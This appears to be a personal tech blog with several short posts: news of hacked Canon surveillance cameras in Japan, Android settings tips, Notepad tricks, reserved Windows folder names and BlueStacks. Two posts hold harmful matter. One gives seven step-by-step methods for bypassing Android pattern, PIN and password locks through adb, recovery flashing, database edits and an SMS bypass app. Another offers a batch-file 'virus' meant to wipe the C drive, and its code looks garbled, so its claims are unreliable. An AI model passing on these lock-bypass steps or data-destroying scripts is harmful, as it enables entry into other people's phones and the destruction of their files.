Tuesday, May 8, 2018

Canon CC Camera Hacked in Japan


Canon CC Camera Hacked in Japan

   Ajay. E
    More than 60 networked Surveillance Cameras that placed in key waterways, Fish markets and Rehabilitation Center was hacked and the attackers left the message on the screen reads “I’m Hacked. bye2.”
All the 60 hacked Surveillance Cameras made by Canon Inc. it is still unknown why the Canon cameras are targeted particularly in the cities Yachiyo in Chiba Prefecture and Ageo in Saitama.
It is noted that all the compromised cameras at several locations are with the default password. Canon urged users to change the default passwords.
The officials at Yachiyo notices the hack on April 24 and determined that the camera’s passwords have been changed and later they removed the affected cameras from the network and reported the incident to police. Whereas Ageo officials identified the hack on April 26.
According to Japantimes Some Japanese companies and government bodies are said to be inordinately susceptible to hackers.
Security cameras connected with Internet allows monitoring through mobile devices, computers, and Tablets. But experts said these connected IoT devices can be used by hackers as an entry point to penetrate into the secured networks.
“The cases indicate (internet of things technology) has many security issues,” an information security expert known by the alias “Piyokango,” said. “It is important that you make sure to change the default passwords.”
IoT devices should not be furnished with default passwords, it could be easily hijacked by attackers and use them for malicious purposes.
The self-replication Hajime Worm and the dangerous Mirai Botnet are the well-known botnets that target IoT devices.
According to ptsecurity “approximately 15 out of 100 devices passwords have never been changed from their default values. And just the five most popular username/password pairs are enough to get admin access to 1 out of every 10 devices”.

Monday, October 23, 2017

hack pattern lock of mobile

Hack pattern lock of Android Device...

By
Ajay
METHOD I
Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc…) Installed:
INSTRUCTIONS:
1. Download this zip Pattern Password Disable (Download from attachments) on to your sdcard
(using your PC, as you cant get into your phone, right )
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done!
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 2
Solution For Everyone Without Recovery Installed – ADB:
What You Need:
=>A computer running a Linux distro or Windows+Cygwin
=>USB cable to connect your phone to the PC
=>Adb installed
How to install adb:
1. Open Terminal
2. Type:
“sudo apt-get install android-tools-adb”
-> Hit [Enter]
3. Follow the instructions until everything is installed.
INSTRUCTIONS:
1. Connect you (turned on) Phone to the Computer via USB.
2. Open a terminal window.
3. Type:
adb devices
adb shell
cd data/system
su
rm *.key
4. Done.. Now You Just Have To Reboot.
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 3
Solution For Everyone Before Lock Accident :
SMS Bypass – Download Link – Install It On Your Device (Download from attachments)
This App Allows You To Remotely Bypass Your Phone’s Screen Lock By Sending A SMS.
It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
SMS Bypass App Requires Root.
INSTRUCTIONS:
1.First, make sure you give permanent root access to the app.
2.Change the secret code to your preferred choice. The default password is : 1234
3.To reset your screen lock, send the following message from another phone:
secret_code reset
Example:
1234 reset
Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
Note 2 : There is an option available to change the preset keyword. Default is : reset – Your phone will restart and your lock screen will be reset.
Note 3 : If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 4
Solution For Everyone Via Adb – SQL Command :
INSTRUCTIONS:
=>Type This Commands Separated In Your Terminal (CMD Prompt) :
adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
.quit
=>Now You Just Have To Reboot.
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 5
Solution For Everyone Via Adb – File Removal :
INSTRUCTIONS:
=>Type This Command In Your Terminal (CMD Prompt) :
adb shell rm /data/system/gesture.key
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 6
Solution For Everyone With USB Debugging Enabled :
INSTRUCTIONS:
Primary Step for all method:
Download & Extract to anywhere – Bypass Security Hack (Download from attachments)
Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
Run pull settings.db.cmd inside By-pass security Hacks folder to pull out the setting file out of your phone.
Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
Navigate to Browse data tab, At table there, click to list down the selection & select secure.
Instruction To Remove Pattern Lock:
Now, find lock_pattern_autolock, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone
Instruction To Remove PIN Lock:
Now, Find Or Create lockscreen.password_type, double-click & change it’s value to 65536, Apply changes!
Now, find lock_pattern_autolock, Delete Record, If doesn’t exist, Ignore
Close & save database
Run push settings.db.cmd and reboot your phone
Instruction To Remove Password Lock:
Now, find lockscreen.password_salt, Delete Record
Now, find lockscreen.password_type, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.
METHOD 7
Solution For Everyone With Recovery Installed :
INSTRUCTIONS:
1.Download and Copy Aroma File manager.zip (Download from attachments) to your memory card.
2. Open your recovery (press volume Down + Power button or it can be different according to the phones. Generally the phones who have pressable button on the middle they have to press all three buttons. Google for you pattern there are lots)
3. There’ll b an option in recovery called “mount”. Go in that option and then mount all the cache and everything it is there.
4. Then select “update” and select “apply update from SD/external” and select aroma file manger.zip file that you downloaded using above QR code above.
5. After Flashing or updating, the aroma file manager will open. Use volume keys for up/down and power button 2 select like you use to get into recovery.
6. In aroma File manager , Go to menu , which is located in bottom strip and then select Settings.
7. Go to bottom n select “mount all partition in startup ” then exit from aroma file manager.
8. Now after exit, re-update that aroma file again and it will open again.
9. Go to data >> and then System.
Then find ‘gesture.key’ (for pattern lock) and ’password.key’ (for password lock) then long touch on gesture.key or password.key and sum option will be prompted , choose delete and delete that file and restart.
Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-in.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=IN&source=ac&ref=qf_sp_asin_til&ad_type=product_link&tracking_id=newtrickandti-21&marketplace=amazon&region=IN&placement=B0784BZ5VY&asins=B0784BZ5VY&linkId=1b6100ee6a13c3f00fa75c4f16c9a78c&show_border=false&link_opens_in_new_window=false&price_color=333333&title_color=0066C0&bg_color=FFFFFF">
    </iframe>

FOR educational purpose only

Thursday, January 14, 2016

COOL ANDROID TIPS!!!!!!!!!!!!!!!

COOL ANDROID TIPS

By 

Ajay.E

1. Disable App Notifications

Bugged by annoying app notifications that just keep coming? If you don’t know already, these app notifications also drain your phone’s battery. If you want to turn them off, and you are on Jelly Bean 4.1 and above, here’s how:
  1. On any of your unwanted notifications in your notification bar, long press on the notification for a message box to appear.
  2. Tap on App Info > Untick Show Notifications > OK.

2. Disable Mobile Data

Whenever you don’t need to stay connected, disabling the Mobile Data can help keep your smartphone battery from draining too quickly. Turning off mobile data is as easy as:
  1. Going to Settings > Data Usage.
  2. Disable Mobile data by toggling the setting from ON to OFF.

3. Set Mobile Data Limit

Want to keep track of how far your usage is from your monthly mobile data limit? If you have ICS and above, there is a feature which lets you keep track of how much of the quota you have left.
  1. Head over to Settings > Data Usage.
  2. Set your data limit by dragging the orange line to reflect your monthly quota.
  3. Set your data usage cycle based on when your "month" starts and ends, and you’re done.
You will be alerted once you hit the limit you have set. Note that the tracked data usage of your phone may vary slightly than your carrier’s tracking.

4. Add Multiple Google Accounts

You need a Google account to use an Android phone but did you know you can choose to run more than one Google account on your Android device. This is convenient if you use more than one account for several of your Google services. To add multiple Google accounts:
  1. Go to Settings > Add account.
  2. Select Google and setup your New or Existing Google account.
  3. Once added, choose what you want to sync with the account.
Repeat all the steps above if you want to add more accounts.

5. Disable automatic App Updates

Prefer to read through app permissions and manually pick which app updates to adopt? You can, but first you need to disable your automatic app updates. Here are the steps:
  1. Open Play Store and head over to Settings.
  2. Tap on Auto-update apps.
  3. Choose Do not auto-update apps.
If you want to enable the auto updates, follow the same path and choose Auto-update apps at any time or via Wi-Fi (available for certain Android devices only).
To update your apps manually, just open Play Store, and on the main page swipe in from the left and tap on My apps. You can tap on apps with pending updates and update them manually, or if you like to update them all at once, just tap on Update All.

6. How To Check For android System updates

For Android users that are using stock ROM, you may want to look for new updates to your system. To check for updates:
  1. Go to Settings > About phone/tablet.
  2. Tap on System updates.
  3. Tap Check now to look for system updates.

7. Changing Default Apps

If you have already set some default apps for particular tasks (e.g. using Chrome for opening web links) but wish to change this:
  1. Go to Settings > Apps.
  2. Swipe right and look for the All tab.
  3. Select the app you want to remove as default.
  4. Tap on Clear defaults.

8. Organize Homescreen Shortcuts With Folders

Once you have a lot of apps installed, your homescreen might be filled with app shortcuts. Unlike the app drawer, the apps on your home screen are not arranged alphabetically. So, you might want to create some folders for your homescreen shortcuts.
  1. Assuming you have more than a handful of shortcuts already on your homescreen, long press on any of the shortcuts and drag it onto another shortcut.
  2. A circle should now appear around the apps, indicating that a folder has been created.
  3. By tapping on the newly created folder, a mini window will pop up with your apps in it.
  4. You can drag and drop additional apps into the folder if you like. You can also rename the folder by tapping on the text area at the bottom of the mini window.

9. Disable Animations

Here’s a tip on how to make your Android device run a bit smoother: disable its animations. You will need to have access to Developer Options which can be found under Settings or About device.
Note: For some phones, you may need to go to Build number and tap on it repeatedly until you see "You are now a developer!". Developer options are now enabled.
Under enabled Developer options, look for Window animation scale, Transition animation scale, and Animator duration scale. Then, turn them off (disable) them one at a time.

10. How to Turn Off Auto-Correction

Hate the fact that your phone is going English teacher mode on you? Turn off auto-correction for peace of mind when texting.
  1. Go to Settings > Language & input.
  2. Tap on the settings icon next to the keyboard that you are using, e.g. Google Keyboard.
  3. Look for Auto-correction and tap on it.
  4. Select Off to turn auto-correction off.
Turn Off Auto-Correction

Tuesday, May 26, 2015

Making Personal Diary Using Notepad

Making Personal Diary Using Notepad 

Ajay.E

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

Creating Virus That Format C Drive

 

Creating Virus That Format C Drive

By Ajay.E

Note:- This is for educational purpose only; i am not responsible when you do this!!!

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
 
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

Create A Undeletable And Unrenamable Folders In Windows

Create A Undeletable And Unrenamable Folders In Windows

By

Ajay.E

creating undeleteable files
In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.



Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

How To Create Undeletable And Unrenamable Folders ?

  1. Go to Start and then Click on Run
  2. Type cmd & hit enter (To open Command Prompt ).
  3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  4. Type D: or E: and hit enter
  5. Type md con\ and hit enter (md - make directory)
  6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  7. Open that directory, you will see the folder created of name con.
  8. Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
  1. Open Command Prompt
  2. Type D: ( if u created this type of folder in D: drive) & hit enter
  3. Type rd con\ (rd - remove directory)
  4. Open that directory and the folder will not appear because it is removed.

Tuesday, November 25, 2014

Install andriod app on Windos pc

Install andriod app on pc

Ajay. E
BlueStacks is currently the best way to run Android apps on Windows. It doesn’t replace your entire operating system. Instead, it runs Android apps within a window on your Windows desktop. This allows you to use Android apps just like any other program. BlueStacks also includes support for easy installation of apps from Google Play, so the process is as seamless as possible. Even better, BlueStacks runs Android apps and games with surprisingly good performance.
This solution can’t replace Windows with Android, but that’s not a bad thing — competing solutions that allow you to dual boot Android with Windows are currently unstable. This is only a solution for running Android apps on Windows.  Unlike many of the other options here, this is a fairly stable and polished experience.
Similar applications, including YouWave and Windroy, lack the speed and easy app installation BlueStacks offers